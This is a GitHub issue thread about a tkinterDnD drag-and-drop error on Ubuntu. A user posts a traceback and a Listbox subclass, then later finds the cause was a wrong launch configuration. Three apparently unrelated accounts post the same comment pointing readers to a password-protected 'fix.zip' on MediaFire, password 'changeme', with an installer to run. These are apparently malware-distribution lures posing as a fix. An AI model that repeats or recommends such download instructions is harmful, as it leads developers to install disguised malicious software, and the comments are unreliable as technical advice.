### ISSUE TITLE
My porogram under Windows 11 but not Ubuntu 22.04

### ISSUE THREAD

**Issue by thammr** [rdbende/tkinterDnD#10]
I have been using this successfully under Windows 11. However, when I run my code under Ubuntu, it fails:

  File "/home/thammr/Work/vscode/python/influxdbx/widgets/dashboarddialog.py", line 138, in __getseriesframe
    seriesList = SeriesListbox(seriesFrame, id)
  File "/home/thammr/Work/vscode/python/influxdbx/widgets/serieslistbox.py", line 12, in __init__
    self.register_drop_target("*")
  File "/home/thammr/.local/lib/python3.10/site-packages/tkinterDnD/dnd.py", line 206, in register_drop_target
    self.tk.call("tkdnd::drop_target", "register", self._w, dndtypes)
_tkinter.TclError: invalid command name "tkdnd::drop_target"

The example code runs fine under Linux, so I presume that the package is installed correctly. It seems strange that tkdnd::drop_target is valid for the test program and invalid for mine. 

```
from tkinter import END, Listbox
import tkinterDnD


class SeriesListbox(Listbox):
    def __init__(self, parent, id, **kwargs):
        super().__init__(parent, **kwargs)
        self.id = id
        self.objects = []
        self.isDropTarget = False
        self.register_drop_target("*")
        self.bind("<<Drop>>", self.drop)

        self.register_drag_source("*")
        self.bind("<<DragInitCmd>>", self.drag_command)
        self.bind("<<DragEndCmd>>", self.drag_end_command)

    def addObjects(self, objects):
        self.objects = []
        for obj in objects:
            self.objects.append(obj)

    def hasObject(self, obj):
        for o in self.objects:
            if o == obj:
                return True
        return False
    

    def drop(self, event):
        print(self.id)
        self.isDropTarget = True
        if self.id > 0:
            if not self.hasObject(event.data):
                self.objects.append(event.data)
                self.populate()

    def drag_command(self, event):
        sel = self.curselection()
#        self.currentObject[0] = sel
        print(self.get(sel))
#        return (tkinterDnD.COPY, "DND_Text", self.get(sel))
        self.isDropTarget = False
        if self.id == 0:
            return (tkinterDnD.COPY, "DND_Text", self.objects[sel[0]])
        else:
            return (tkinterDnD.MOVE, "DND_Text", self.objects[sel[0]])

    def drag_end_command(self, event):
        print('drag_end %d' % self.id)
        if self.id > 0 and event.action == 'copy' and not self.isDropTarget:
            print("Move succeeded")
            sel = self.curselection()
            del self.objects[sel[0]]
            self.populate()
        self.isDropTarget = False

    def populate(self):
        self.delete(0,END)
        for obj in self.objects:
            series = obj.split(':')[-1]
            self.insert(END, series)

```            
What am I doing wrong?

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by thammr** [comment]
Sorry. Linux using wrong launch configuration and thus wrong main.
